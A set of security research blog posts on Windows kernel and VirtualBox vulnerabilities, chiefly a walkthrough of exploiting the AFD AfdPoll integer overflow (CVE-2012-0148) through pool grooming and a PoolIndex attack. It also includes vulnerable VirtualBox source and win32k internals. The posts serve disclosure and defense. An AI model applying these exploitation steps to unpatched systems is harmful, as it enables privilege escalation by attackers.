CVE-2012-0148: A Deep Dive Into AFD

This week, Microsoft addressed two vulnerabilities in the Ancillary Function Driver (AFD) that could allow non-privileged users to elevate their privileges to SYSTEM. In this blog entry, we look at one of the patched vulnerabilities and demonstrate practical exploitability against x64 Windows 7 using the techniques presented at INFILTRATE 2011 on modern kernel pool exploitation.

Introduction

The Ancillary Function Driver (AFD) is the kernel management layer of the Windows Sockets interface. As with many other popular operating systems, Windows and AFD manage network connection endpoints as sockets. The socket paradigm was adapted for Windows in Windows Sockets 1.1, which supported the most basic functionality traditionally found in BSD. The main goal behind this design was to make it easy for Unix developers to port their existing network-aware applications to the Windows platform. Microsoft later introduced the Windows Sockets 2 architecture, compliant with the Windows Open System Architecture. Winsock 2.0 defines a standard service provider interface between the application programming interface (API), with its functions exported from WS2_32.dll, and the protocol stacks. This allows Winsock 2.0 to support multiple transport protocols, whereas Winsock 1.1 is limited to TCP/IP only. On top of the Winsock standard, Windows also includes extensions that primarily enhance performance (e.g. TransmitFile) and conserve memory and processing, for instance by providing the ability to reuse sockets (e.g. supported by ConnectEx and AcceptEx).

Winsock Architecture

The Winsock architecture is divided into a user-mode and a kernel-mode layer. At the highest level, applications interact with the Windows Sockets API (ws2_32.dll), which offers familiar functions such as bind, listen, send, and recv. These functions call into a suitable provider, either defined by the system or by an application. For instance, VMCI sockets can be used by VMware virtual machines to communicate with other virtual machines. Here, the VMCI provider (installed by VMware Tools) calls into the VMCI socket library (vsocklib.dll), which then calls into the VMCI driver (vmci.sys) responsible for managing and calling out to the host/other virtual machines. Similarly, Windows registers a provider for the Winsock API (mswsock.dll) for its natively supported protocols such as TCP and UDP. Winsock then operates through the Ancillary Function Driver (afd.sys) to perform the necessary socket management and callouts to TCP/IP.

Although the networking architecture in Windows changed notably in Windows Vista, the way applications interact with the Windows Sockets API and with AFD remains largely the same.

Figure: Winsock Architecture

Socket Management

The Ancillary Function Driver, or afd.sys, is responsible for creating and managing socket endpoints in Windows. Internally, Windows represents a socket as a file object, with additional attributes defined to keep track of state information such as whether a connection has been established or not. This allows applications to use standard read and write APIs on socket handles to access and transmit network data.

When AFD is first initialized, it creates the AFD device (in turn accessed by Winsock applications) and sets up the associated driver object IRP handlers.  When an application first creates a socket, the IRP_MJ_CREATE routine (afd!AfdCreate) is called to allocate an endpoint data structure (afd!AfdAllocateEndpoint). This is an opaque structure that defines every unique attribute of each endpoint as well as the state it is in (e.g. whether it is connecting, listening, or closing). AFD functions operating on the endpoint structure (e.g. the send and receive functions) will typically validate the endpoint state before proceeding. Additionally, a pointer to the endpoint data structure itself is stored in the FsContext field of the socket file object such that AFD can easily locate the socket management data. AFD also keeps track of all endpoints through a doubly linked list (afd!AfdEndpointsList), such as for determining whether an address has already been bound.

The majority of the functionality found within AFD is accessed through the device I/O control handler. AFD also provides fast device I/O control routines in order to service requests which can be satisfied directly from the cache manager and don’t require an IRP to be generated. AFD will attempt to use the fast I/O dispatch routines whenever possible, particularly when reading and writing network data. However, in some situations where more extensive processing is needed, it will fall back to the regular IRP-based mechanism. An example of this is whenever the size of a datagram exceeds 2048 bytes, or when a connection (endpoint) isn’t in the expected state.

When looking at functions in AFD, particularly those called by the dispatch I/O control routine, it is important to pay attention to the validation performed on the request up front. In fact, looking over most functions in AFD, one repeatedly notices comparisons against constants such as 0xAFD0, 0xAFD1, 0xAFD2, and so on. These constants describe the state of the active socket endpoint/connection and are stored in the very first 16-bit field of the endpoint data structure. For instance, 0xAFD1 indicates an endpoint representing a datagram socket while 0xAFD0, 0xAFD2, 0xAFD4, and 0xAFD6 indicate endpoints representing TCP sockets in various states.

AFD!AfdPoll Integer Overflow Vulnerability (CVE-2012-0148)

The Windows Sockets API allows applications to query the status of one or more sockets through the select function. These requests are handled internally by the AFD.SYS driver in the afd!AfdPoll function (which internally calls afd!AfdPoll32 or afd!AfdPoll64 depending on the process that made the I/O request), and are processed whenever the AFD device is issued the 0x12024 I/O control code. This function processes a user-supplied poll information (AFD_POLL_INFO) buffer that contains all the records (AFD_HANDLE) for the sockets to query. The definitions of these structures are listed below (based on ReactOS).

typedef struct _AFD_HANDLE_ {
    SOCKET                              Handle;
    ULONG                               Events;
    NTSTATUS                            Status;
} AFD_HANDLE, *PAFD_HANDLE;

typedef struct _AFD_POLL_INFO {
    LARGE_INTEGER                       Timeout;
    ULONG                               HandleCount;
    ULONG                               Exclusive;
    AFD_HANDLE                          Handles[1];
} AFD_POLL_INFO, *PAFD_POLL_INFO;

Upon receiving this data, AFD calls afd!AfdPollGetInfo to allocate a second buffer (from the non-paged pool) to aid in storing information returned as the individual sockets are queried. Specifically, each AFD_HANDLE record is assigned its own AFD_POLL_ENTRY record in this internal buffer structure (which we call AFD_POLL_INTERNAL). We describe these opaque structures as follows.

typedef struct _AFD_POLL_ENTRY {
    PVOID                               PollInfo;
    struct _AFD_POLL_ENTRY             *PollEntry;   /* PAFD_POLL_ENTRY is not declared yet at this point */
    PVOID                               pSocket;
    HANDLE                              hSocket;
    ULONG                               Events;
} AFD_POLL_ENTRY, *PAFD_POLL_ENTRY;

typedef struct _AFD_POLL_INTERNAL {
    CHAR                                Unknown[0xB8];
    AFD_POLL_ENTRY                      PollEntry[1];
} AFD_POLL_INTERNAL, *PAFD_POLL_INTERNAL;

Before processing the user-supplied buffer (AFD_POLL_INFO) to query each individual socket, afd!AfdPoll ensures that the buffer is large enough to fit the number of records indicated by the HandleCount value. If the size is too small, the function returns with an insufficient size error. While this prevents user-mode code from passing bogus HandleCount values, it does not account for the fact that the size of the records allocated internally by the AfdPoll function exceeds that of the provided poll information buffer. For instance, on Windows 7 x64 the size of an AFD_HANDLE entry is 0x10 bytes, while the size of the corresponding entry allocated internally (AFD_POLL_ENTRY) is 0x28. An additional 0xB8 bytes are also added to store metadata used internally by the poll function. With enough entries, this difference may lead to a condition where AFD sufficiently validates the poll information buffer passed in from user-mode, but triggers an integer overflow when calculating the size of the internal buffer.

Figure: Integer Overflow in AfdPoll64

Once the function proceeds to query each individual socket and fill in their respective AFD_POLL_ENTRY records of the undersized buffer, a pool overflow occurs as the original HandleCount value is used to determine the number of records to be processed.

Exploitability

The security impact of a vulnerability is in many ways tied to its exploitability. In order to assess the exploitability of the described vulnerability, we need to understand both the conditions under which the vulnerability is triggered as well as how the affected module interacts with system components such as the kernel pool allocator.

In order to trigger the vulnerability, we first need to allocate enough memory to ensure that the multiplication and constant addition result in an integer overflow. This is because AFD internally validates the size of the user-provided buffer by dividing it by the size of each record (AFD_HANDLE) to see if the supplied count (HandleCount) is consistent. On x64 (Win7), 0x6666662 elements are enough to cause a wrap, meaning that a user-mode buffer of size 0x10 + (0x6666662 * 0x10) must be passed to the driver. This translates to 1638MB, which furthermore needs to be cached in an internal kernel buffer by the I/O manager as the affected IOCTL uses METHOD_BUFFERED. On x86 (Win7), a user-mode buffer of size 0x99999970 (0x10 + (n * 0xC), where n is (0x100000000 - 0x68) / 0x14 rounded up) has to be allocated. As this is only feasible in /3GB configurations, and the kernel needs an equivalent amount of memory to be cached, we don’t consider this vulnerability to be practically exploitable on 32-bit systems.

As the vulnerability results in an out-of-bounds copy to an undersized pool allocation, sufficient knowledge about the pool allocator and its inner workings is also needed. When dealing with pool overflows, one of the most important questions that comes up is whether the attacker is able to limit the number of elements that are written outside the allocated buffer. As the kernel pool is used globally by the system, any memory corruption could potentially affect system stability. In the most frequent case, the vulnerable code will use the count value that was initially used to cause the integer overflow and thus copy elements until an invalid page is hit either in the source or destination buffer. As both buffers are allocated in kernel-mode (METHOD_BUFFERED has already cached the user-provided buffer), we cannot rely on unmapped pages to terminate the copy, as we could if the buffer were passed in directly from user-mode. However, there are also cases where validation is enforced on each copied element, which may allow the attacker to terminate the copy arbitrarily (e.g. see the vulnerabilities discussed in “Kernel Pool Exploitation on Windows 7”).

In the vulnerable function, AFD copies the user-supplied AFD_POLL_INFO structure to an internal and potentially undersized buffer allocation. This internal structure is later processed by the same function when querying the status of each individual socket. Before each AFD_HANDLE entry (embedded in the AFD_POLL_INFO structure) is copied to the internal buffer, afd!AfdPoll64 calls ObReferenceObjectByHandle to validate the socket handle and retrieve the backing file object of each respective entry. If the validation fails, the function terminates the copy operation and ignores the remaining entries. In the context of exploitation, this becomes very valuable as we can terminate the pool overflow at the granularity of the size of an internal record structure (sizeof(AFD_POLL_ENTRY)).

Figure: Socket Handle Validation

At this point, we know that we can limit the overflow at 0x28 boundaries. We also know that we can overflow the size of the internal buffer structure because we control n in size = 0xB8 + (n * 0x28). The next task then becomes to find a suitable target of the overflow. For this particular bug, we leverage the PoolIndex attack as described in “Kernel Pool Exploitation on Windows 7”, and overflow the pool header of the next pool allocation. In order to do this reliably, we have to do two things.

  1. Manipulate the kernel pool such that reliable and predictable overwrites can be achieved.
  2. Find a suitable size to allocate such that we overflow just enough bytes to corrupt the adjacent pool header.

Finding the desired size essentially depends on the allocation primitives we have at our disposal. Since the pool overflow is in the non-paged pool, we ideally want to use APIs that allow us to allocate and free memory arbitrarily from this resource. One possibility here is the use of NT objects. In fact, the worker factory object (created in NtCreateWorkerFactory) is of particular interest to us because on our target platform (Windows 7 x64), the size of this object is 0x100 bytes (0x110 including the pool header). By providing the AfdPoll64 function with an AFD_POLL_INFO structure and a HandleCount value of 0x6666668, we can cause the size of the internal buffer allocation to overflow and result in a 0xF8 byte allocation. When rounded up to the nearest block size by the pool allocator, the internal buffer will be 0x100, the same size as the worker factory object. This way, we can manipulate chunks of 0x100 bytes in order to position the buffer allocated by AFD next to a chunk that we control.

When we trigger the overflow, we copy only two records to the internal buffer structure. We do this by providing an invalid socket handle as the third AFD_HANDLE entry. The first record is copied to offset 0xB8 of the internal buffer (whose size is now 0x100), while the second record begins at 0xE0. Because each AFD_POLL_ENTRY record is actually 0x24 bytes in size (padded to 0x28 for alignment), we overflow 4 bytes into the next pool allocation. Specifically, we overflow into the pool header bits (nt!_POOL_HEADER), enough to mount the pool index attack. We fully control the first four bytes in the pool header because the Events value (ULONG) in the AFD_HANDLE structure is copied to offset 0x20 in the AFD_POLL_ENTRY record.

Figure: Pool Overflow

When mounting the pool index attack, we leverage the fact that the pool allocator in Windows does not validate the pool index upon freeing a pool chunk. Windows uses the pool index to look up the pointer to the pool descriptor to which it returns the freed memory block. We can therefore reference an out-of-bounds pointer (null) and map the null page to fully control the pool descriptor. By controlling the pool descriptor, we also control the delayed free list, a list of pool chunks waiting to be freed. If we furthermore indicate that the delayed free list is full (0x20 entries), it is immediately processed upon the free to our crafted pool descriptor, hence we are able to free an arbitrary address to a fully controlled linked list. In short, this means that we are able to write any given controllable address to an arbitrary location. From here, we can overwrite the popular nt!HalDispatchTable entry or any other function pointer called from ring 0.

Update (2012-02-18): Thanks to @fdfalcon for pointing out a miscalculation regarding the memory usage on x64.

Windows Hooks of Death: Kernel Attacks through User-Mode Callbacks

At Black Hat USA 2011, I presented the research that led up to the 44 vulnerabilities addressed in MS11-034 and MS11-054. These vulnerabilities were indirectly introduced by the user-mode callback mechanism which win32k relies upon to interact with data stored in user-mode as well as provide applications the ability to instantiate windows and event hooks. In invoking a user-mode callback, win32k releases the global lock it acquires whenever making updates to data structures and objects managed by the Window Manager (USER). In doing so, applications are free to modify the state of management structures as well as user objects by invoking system calls from within the callback itself. Thus, upon returning from a user-mode callback, win32k must perform extensive validation in order to make sure that any changes are accounted for. Failing to properly validate such changes could result in vulnerabilities such as null-pointer dereferences and use-after-frees.

The slide deck for the Black Hat presentation and the accompanying whitepaper outline several of the vulnerabilities that may arise from the lack of user-mode callback validation. In particular, we look at the importance of user object locking, validating object and data structure state changes, and ensuring that reallocatable buffers are sufficiently validated. In order to assess the severity of the mentioned vulnerabilities, we also investigate their exploitability and, with that, show how an attacker could very easily (e.g. using kernel pool or heap manipulation) obtain arbitrary kernel code execution. Finally, because vulnerability classes such as use-after-frees and null-pointer dereferences have been (and still are?) extremely prevalent in win32k, we conclude by evaluating ways to mitigate their exploitability.

In retrospect, Black Hat USA and DEFCON stand out as those great conferences where you get to meet many interesting people and can run into just about anyone. Having spent what now seems like a lifetime in win32k (ok, I may be slightly exaggerating…), meeting one of the past developers of the Window Manager whose code I had torn to pieces (sorry!) was one of those great moments that will be remembered for years to come. I also want to use this occasion to extend my gratitude and thanks to everybody who showed up for my talk. Your feedback is highly appreciated, and I would probably not have been doing this if it wasn’t for you guys. See you on the flipside!

Oracle VirtualBox Integer Overflow Vulnerabilities

In VirtualBox 4.0.10 and the Critical Patch Update for July 2011, Oracle addressed two vulnerabilities that could be leveraged by an attacker to gain elevated privileges in a Windows guest (CVE-2011-2300) or execute arbitrary code on the host (CVE-2011-2305). The former affected the VirtualBox XPDM display driver, installed on Windows guests as part of the VirtualBox Guest Additions, while the latter was a vulnerability in the VirtualBox 3D graphics stack, resulting in host memory corruption. Before we look closer at the details of these vulnerabilities, we’ll briefly review the Windows 2000/XP display driver architecture.

Windows 2000/XP Display Driver Model

In the XPDM architecture, every graphics adapter is associated with a display driver and a corresponding miniport driver. The display driver is essentially a DLL whose primary responsibility is rendering. It is written for any number of adapters that share a common drawing interface and hooks drawing operations offered by GDI (win32k) to enhance performance. The display driver also has direct access to video hardware registers for time-critical operations.

Figure: XP Display Driver Model Architecture

The video miniport driver generally interacts with other NT kernel components and is written specifically for one adapter (or family of adapters). It manages all the resources shared between the video miniport driver and the display driver, and handles hardware initialization, mode sets, and physical device memory mapping. Notably, the video miniport driver can only make calls exported by videoprt.sys. In order to request support from the video miniport driver, the display driver calls EngDeviceIoControl with a control code specific to the desired operation.

A display driver may implement a number of different graphics DDI functions depending on the drawing operations to accelerate or features to support. In general, DDI functions are grouped into three categories: functions required by every display driver, functions required under certain conditions, and functions that are optional. The functions implemented and supported by a display driver are defined by DrvEnableDriver (DriverEntry), whose prototype is shown below.

BOOL DrvEnableDriver(
    ULONG iEngineVersion,
    ULONG cj,
    __in  DRVENABLEDATA *pded
);

Upon loading the driver, the OS sets the iEngineVersion according to the version of GDI that is currently running (e.g. Windows 2000 or XP). The display driver then fills the DRVENABLEDATA structure accordingly with the supported interfaces. Subsequently, upon making GDI and DirectX calls, win32k.sys and dxg.sys call the corresponding function in the display driver.

Figure: DrvEnableDriver Example

Because the XPDM display driver model requires vendors to marshal great amounts of data in kernel-mode in handling large and complex Direct3D/DirectDraw structures, there is a significant probability of security vulnerabilities being present. It should be noted that the newer Windows Vista Display Driver Model (WDDM) tries to address this by moving such processing into a user-mode driver. In the event that GDI does not offer a suitable interface for say some specific graphics adapter capability, XPDM allows developers to use generic Escape calls. This enables user-mode applications to instruct the display driver to exercise specific functionality, much like the DeviceIoControl interface does in regular kernel-mode drivers. It is no secret that such interfaces should be carefully audited as they directly operate on user provided data and thus become a prime candidate for privilege escalation vulnerabilities.

XPDM Display Driver Integer Overflow Vulnerability

The XPDM display driver in VirtualBox implements the DrvEscape interface to provide information about the mode of operation, but more importantly the ability to set the visible region of a guest’s display. This is done by making a VBOXESC_SETVISIBLEREGION escape call (e.g. via ExtEscape) with a RGNDATA formatted buffer holding the array of rectangles that compose the region. The display driver copies this information to a buffer of its own before sending the information to the host.

[trunk/src/VBox/Additions/WINNT/Graphics/Video/disp/xpdm/VBoxDispDriver.cpp]

        case VBOXESC_SETVISIBLEREGION:
        {
            LOGF(("VBOXESC_SETVISIBLEREGION"));
            LPRGNDATA lpRgnData = (LPRGNDATA)pvIn;

            if (cjIn >= sizeof(RGNDATAHEADER)
                &&  pvIn
                &&  lpRgnData->rdh.dwSize == sizeof(RGNDATAHEADER)
                &&  lpRgnData->rdh.iType  == RDH_RECTANGLES
                &&  cjIn == lpRgnData->rdh.nCount * sizeof(RECT) + sizeof(RGNDATAHEADER))
            {
                DWORD   i;
                PRTRECT pRTRect;
                int     rc;
                RECT   *pRect = (RECT *)&lpRgnData->Buffer;

                pRTRect = (PRTRECT) EngAllocMem(0, lpRgnData->rdh.nCount*sizeof(RTRECT), MEM_ALLOC_TAG);
                if (!pRTRect)
                {
                    WARN(("failed to allocate %d bytes", lpRgnData->rdh.nCount*sizeof(RTRECT)));
                    break;
                }

                for (i=0; i<lpRgnData->rdh.nCount; ++i)
                {
                    LOG(("New visible rectangle (%d,%d) (%d,%d)",
                         pRect[i].left, pRect[i].bottom, pRect[i].right, pRect[i].top));
                    pRTRect[i].xLeft   = pRect[i].left;
                    pRTRect[i].yBottom = pRect[i].bottom;
                    pRTRect[i].xRight  = pRect[i].right;
                    pRTRect[i].yTop    = pRect[i].top;
                }

The vulnerability addressed in VirtualBox 4.0.10 was an integer overflow in multiplying the number of rectangles (rdh.nCount, named cRects in the fix) by the size of an RTRECT structure (equivalent to RECT), the result of which was used to determine the size of the driver-allocated buffer. This in turn resulted in a kernel pool overflow as the driver later used the unmodified rectangle count in copying the rectangles. The latest maintenance release ensures that the multiplication does not wrap by casting sizeof(RECT) to a uint64_t and that the rectangle count does not exceed 1 million.

            if (    cjIn >= sizeof(RGNDATAHEADER)
                &&  pvIn
                &&  lpRgnData->rdh.dwSize == sizeof(RGNDATAHEADER)
                &&  lpRgnData->rdh.iType  == RDH_RECTANGLES
                &&  (cRects = lpRgnData->rdh.nCount) <= _1M
                &&  cjIn == cRects * (uint64_t)sizeof(RECT) + sizeof(RGNDATAHEADER))
            {

Although there’s a theoretical possibility of exploiting this vulnerability, the large copy makes it somewhat difficult. On MP systems, an attacker may be able to corrupt a kernel object or structure in the non-paged pool and trigger use of it before the copy reaches unmapped memory or triggers some other fault.

VBoxSharedOpenGL Host Service Integer Overflow Vulnerability

As current graphics adapters do not offer virtualization of resources, providers of virtualization solutions need to abstract the graphics rendering in guests in order to offer the same 2D/3D experience you get on native systems. In VMware Workstation and Player, 3D rendering is performed by buffering commands in a shared memory between the guest and the host which the host processes and translates to OpenGL or Direct3D calls. VirtualBox takes a similar approach and uses Chromium to forward graphics calls from the guest system to the host where they are executed with hardware acceleration.

In the Host-Guest Communication Manager (HGCM), VirtualBox provides the VBoxSharedOpenGL service to give guest applications more direct control of commands passed to the host. Guest applications connect to the VBoxSharedOpenGL service by opening the VBoxGuest device and using the VBOXGUEST_IOCTL_HGCM_CONNECT I/O control code. Subsequent commands are then passed by issuing HGCM calls (VBOXGUEST_IOCTL_HGCM_CALL) and specifying the service command to execute. One of the service commands (SHCRGL_GUEST_FN_WRITE_BUFFER) processed by the host service was found vulnerable to an integer overflow. The affected code is shown below.

[trunk/src/VBox/HostServices/SharedOpenGL/crserver/crservice.cpp]

        case SHCRGL_GUEST_FN_WRITE_BUFFER:
        {
            Log(("svcCall: SHCRGL_GUEST_FN_WRITE_BUFFER\n"));
            /* Verify parameter count and types. */
            if (cParms != SHCRGL_CPARMS_WRITE_BUFFER)
            {
                rc = VERR_INVALID_PARAMETER;
            }
            else
            if (   paParms[0].type != VBOX_HGCM_SVC_PARM_32BIT /*iBufferID*/
                || paParms[1].type != VBOX_HGCM_SVC_PARM_32BIT /*cbBufferSize*/
                || paParms[2].type != VBOX_HGCM_SVC_PARM_32BIT /*ui32Offset*/
                || paParms[3].type != VBOX_HGCM_SVC_PARM_PTR   /*pBuffer*/
               )
            {
                rc = VERR_INVALID_PARAMETER;
            }
            else
            {
                /* Fetch parameters. */
                uint32_t iBuffer      = paParms[0].u.uint32;
                uint32_t cbBufferSize = paParms[1].u.uint32;
                uint32_t ui32Offset   = paParms[2].u.uint32;
                uint8_t *pBuffer      = (uint8_t *)paParms[3].u.pointer.addr;
                uint32_t cbBuffer     = paParms[3].u.pointer.size;

                /* Execute the function. */
                CRVBOXSVCBUFFER_t *pSvcBuffer = svcGetBuffer(iBuffer, cbBufferSize);
                if (!pSvcBuffer || ui32Offset+cbBuffer>cbBufferSize)
                {
                    rc = VERR_INVALID_PARAMETER;
                }
                else
                {
                    memcpy((void*)((uintptr_t)pSvcBuffer->pData+ui32Offset), pBuffer, cbBuffer);

                    /* Return the buffer id */
                    paParms[0].u.uint32 = pSvcBuffer->uiId;
                }
            }

            break;
        }

In the above code, the VBoxSharedOpenGL service does not sufficiently validate the ui32Offset parameter used in specifying the offset into a host-managed buffer. If ui32Offset+cbBuffer results in a wrapped integer, the function may attempt to copy the contents of the guest-supplied data at a negative offset from the allocated buffer on x86 hosts (thus corrupting the preceding memory), or at a positive unvalidated buffer offset (+ui32Offset) on x64 systems. In order to fix this, ui32Offset was cast to uint64_t.

Naturally, exploitability in this case depends on the memory allocator of the host operating system. Writing at a negative offset allows the attacker to corrupt the memory of any preceding memory allocation and may allow for arbitrary code execution if the attacker can sufficiently influence the heap state of the host process. On 64-bit hosts, the attacker may pass a very large pBuffer (cbBuffer) and thus require a small ui32Offset to pass the overflow check. This would allow the attacker to corrupt subsequently positioned memory blocks in the host process.

In attempting to exploit vulnerabilities in virtualized devices such as in a guest-to-host escape scenario, an attacker is typically required to install a driver (to do raw I/O operations or manipulate device memory directly) or perform other tasks that require administrative privileges. In this particular case, no special privileges are required as the vulnerability is triggered through the VirtualBox guest device which permits unprivileged access. Although Oracle admits that the Chromium stack (not enabled by default) may open VirtualBox to security vulnerabilities, the affected component is not directly related to Chromium.

Mitigating Null Pointer Exploitation on Windows

As part of a small research project, I recently looked into how exploitation of null pointer vulnerabilities could be mitigated on Windows. The problem with many of the recent vulnerabilities affecting Windows kernel components is that a large number of these issues can be exploited provided that the attacker maps and controls the contents of the null page. As many of you probably know, Windows allows non-privileged users to map the null page through functions such as NtAllocateVirtualMemory or NtMapViewOfFile.

Although there are multiple ways to approach the problem, the solution proposed relies on manipulation of virtual address descriptors (VADs) using a kernel-mode driver. As VADs are used to implement the PAGE_NOACCESS protection in Windows and contain special properties to secure address ranges in process memory, they can be used to deny null page access in both user and kernel space. The following paper details the proposed mitigation and suggests a possible implementation.

Locking Down the Windows Kernel: Mitigating Null Pointer Exploitation [PDF]

Abstract. One of the most prevalent bug classes affecting Windows kernel components today is undeniably NULL pointer dereferences. Unlike other platforms such as Linux, Windows (in staying true to backwards compatibility) allows non-privileged users to map the null page within the context of a user process. As kernel and user-mode components share the same virtual address space, an attacker may potentially be able to exploit kernel null dereference vulnerabilities by controlling the dereferenced data. In this paper, we propose a way to generically mitigate NULL pointer exploitation on Windows by restricting access to the lower portion of process memory using VAD manipulation. Importantly, as the proposed method employs features already present in the memory manager and does not introduce any offending hooks, it can be introduced on a wide range of Windows platforms. Additionally, because the mitigation only introduces minor changes at process creation-time, the performance cost is minimal.

Thread Desynchronization Issues in Windows Message Handling

This week, Microsoft issued MS11-012 to resolve yet another batch of vulnerabilities in win32k.sys. The bulletin addressed three elevation of privilege vulnerabilities in window class data handling (somewhat related to those patched in MS10-073) and an additional two in window message handling. The latter were quite interesting as they were not your typical vulnerability class, but rather subtle issues caused by the desynchronization of threads engaged in synchronous messaging (using SendMessage APIs). In this post, we’ll review some of the internals concerning window messages and detail the issues at hand.

Past Vulnerabilities

Besides additions such as User Interface Privilege Isolation (UIPI) in Vista [1] and touch and gesture support in Windows 7, the core messaging components have undergone little change over the years. In spite of this, vulnerabilities continue to be discovered. In MS08-025, several data validation vulnerabilities related to user-mode callbacks in the system message handlers were addressed [2]. MS10-098 also fixed a validation issue introduced in Windows 7 upon processing WM_GETTEXT messages that could be leveraged to corrupt the memory of a privileged process. Moreover, additional denial of service vulnerabilities have been reported in system message handlers such as SfnINSTRING and SfnLOGONNOTIFY.

Windows Messages

Windows-based applications are event driven and act upon messages sent to them. Thus, messages and the mechanisms that support them have always played an integral role in the user interface component of the Windows operating system. Each window, owned by a thread, has a window procedure (function) for processing input messages and dispatching them to the operating system. If a thread accesses any of the user interface or GDI system calls (handled by win32k.sys), the kernel creates a THREADINFO structure which holds three message queues used to process input. These are the input queue, the post queue, and the send queue. The input queue is primarily used for mouse and keyboard messages, while the send and post queues are used for synchronous (send) and asynchronous (post) window messages respectively.

typedef struct _tagTHREADINFO           // 156 elements, 0x208 bytes (sizeof)
{

/*0x0BC*/     struct _tagQ* pq;					// input queue

/*0x0E0*/     struct _tagSMS* psmsSent;			// send queue (sent)
/*0x0E4*/     struct _tagSMS* psmsCurrent;		// send queue (current)
/*0x0E8*/     struct _tagSMS* psmsReceiveList;	// send queue (received)

/*0x174*/     struct _tagMLIST mlPost;			// post queue

} tagTHREADINFO, *PtagTHREADINFO;

Asynchronous Messages

Asynchronous messages are used in one-way communication between window threads and are typically used to notify a window to perform a specific task. Asynchronous messages are handled by the PostMessage APIs and are sent to the post queue of the receiving thread. The sender does not wait for the processing to complete in the receiving thread and thus returns immediately. For this reason, asynchronous messages cannot be used with pointers and handles as there is no guarantee that the sender will exist by the time the receiver processes the data.

Synchronous Messages

Synchronous messages differ from asynchronous messages as the sender typically waits for a response to be provided or a timeout to occur before continuing execution. Thus, they require mechanisms to ensure that the threads are properly synchronized and in the expected state. Synchronous messages use the SendMessage APIs which in turn direct execution to the NtUserMessageCall system call in win32k.sys.

NTSTATUS NtUserMessageCall (
	HWND hWnd,				// target window
	UINT Msg,				// message type
	WPARAM wParam,			// param1
	LPARAM lParam,			// param2
	ULONG_PTR ResultInfo,	// param3
	DWORD dwType,			// window procedure
	BOOL bAnsi )			// ansi/unicode

The message type (Msg) is identified by a unique WM code such as WM_SETFOCUS, WM_CREATE, WM_ENABLE, etc. Applications may define their own message codes, but those less than WM_USER (0x400) are reserved by the operating system. Each reserved code serves as an index into win32k!MessageTable (a byte array), in which the lower 6 bits of each entry define the identifier (array index) of the associated system message handler (discussed in the next section).

kd> db win32k!MessageTable
822a42c8  00 c2 00 00 00 00 00 00-00 00 00 00 c3 c4 ec 00  ................
822a42d8  00 00 00 00 80 00 00 00-00 00 c3 c5 00 00 00 00  ................
822a42e8  00 00 00 00 86 00 00 80-00 00 00 87 88 89 00 4a  ...............J
822a42f8  00 80 00 00 00 00 00 00-8b 8c 29 00 a9 00 00 00  ..........).....
822a4308  00 00 00 00 00 00 8d 8e-00 cf 90 00 00 00 00 00  ................
822a4318  00 00 00 91 00 00 00 00-00 00 00 00 00 00 00 00  ................
822a4328  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
822a4338  a9 00 00 00 00 00 00 00-00 00 00 00 92 92 00 00  ................
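As a minimal sketch of the lookup just described, the snippet below masks off the lower 6 bits of a table entry to obtain the handler index. The array only holds the first 16 bytes of the dump above, the helper name handler_index is made up for illustration, and the meaning of the upper two bits of each entry is not modeled.

```c
#include <stddef.h>

/* First 16 bytes of win32k!MessageTable, copied from the dump above. */
static const unsigned char message_table[16] = {
    0x00, 0xc2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xc3, 0xc4, 0xec, 0x00
};

/* Hypothetical helper: returns the handler index for a reserved message
   code, or -1 if the code lies outside the bytes copied here. */
static int handler_index(unsigned int msg)
{
    if (msg >= sizeof(message_table))
        return -1;
    return message_table[msg] & 0x3f;   /* lower 6 bits = function index */
}
```

With these bytes, handler_index(0x01) (WM_CREATE) evaluates to 0x02 and handler_index(0x0c) (WM_SETTEXT) evaluates to 0x03.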

Inter-thread messages are stored in a send message structure (win32k!tagSMS) and appended to the send queue of the receiving thread. The buffer for this structure is allocated in win32k!AllocSMS upon initiating inter-thread messaging in win32k!xxxInterSendMsgEx. The SMS structure holds all the message parameters and information about the sending and receiving threads. The structure is defined as follows (from the Windows 7 public symbols).

typedef struct _tagSMS                      // 15 elements, 0x3C bytes (sizeof)
{
/*0x000*/     struct _tagSMS* psmsNext;
/*0x004*/     struct _tagSMS* psmsReceiveNext;
/*0x008*/     struct _tagTHREADINFO* ptiSender;
/*0x00C*/     struct _tagTHREADINFO* ptiReceiver;
/*0x010*/     FUNCT_00A4_1106_lpResultCallBack* lpResultCallBack;
/*0x014*/     ULONG32      dwData;
/*0x018*/     struct _tagTHREADINFO* ptiCallBackSender;
/*0x01C*/     LONG32       lRet;
/*0x020*/     ULONG32      tSent;
/*0x024*/     UINT32       flags;
/*0x028*/     UINT32       wParam;
/*0x02C*/     LONG32       lParam;
/*0x030*/     UINT32       message;
/*0x034*/     struct _tagWND* spwnd;
/*0x038*/     VOID*        pvCapture;
} tagSMS, *PtagSMS;
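To make the offsets in the listing easier to check, here is a rough layout model of the 32-bit structure. Every pointer field is replaced by a uint32_t so that the offsets hold on any host. The type name sms32 is an assumption for this sketch, not something found in the symbols.

```c
#include <stddef.h>
#include <stdint.h>

/* 32-bit layout model of win32k!tagSMS; pointers are stored as uint32_t. */
typedef struct sms32 {
    uint32_t psmsNext;
    uint32_t psmsReceiveNext;
    uint32_t ptiSender;
    uint32_t ptiReceiver;
    uint32_t lpResultCallBack;
    uint32_t dwData;
    uint32_t ptiCallBackSender;
    int32_t  lRet;
    uint32_t tSent;
    uint32_t flags;
    uint32_t wParam;
    int32_t  lParam;
    uint32_t message;
    uint32_t spwnd;
    uint32_t pvCapture;
} sms32;

/* Compile-time checks against the offsets shown in the listing. */
_Static_assert(offsetof(sms32, ptiSender) == 0x08, "ptiSender offset");
_Static_assert(offsetof(sms32, flags)     == 0x24, "flags offset");
_Static_assert(offsetof(sms32, message)   == 0x30, "message offset");
_Static_assert(sizeof(sms32)              == 0x3c, "structure size");
```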

Client and Server Functions

The function id stored in the message table denotes an index into a client (gapfnMessageCall) or server (gapfnScSendMessage) function table. The client functions are used by threads sending a message while the server functions are used by threads processing a message. The client functions (prefixed by NtUserfn) are mostly used for probing and caching (copying to kernel memory) of user-mode data. Server functions (prefixed by Sfn) parse and process the content of the message and, if necessary, return data to the sending thread. The following tables show the first few functions of the client and server function tables as found in the data section of win32k.sys.

.rdata:BF9F30C8 _gapfnScSendMessage dd offset _SfnDWORD@32
.rdata:BF9F30CC                 dd offset _SfnNCDESTROY@32
.rdata:BF9F30D0                 dd offset _SfnINLPCREATESTRUCT@32
.rdata:BF9F30D4                 dd offset _SfnINSTRINGNULL@32
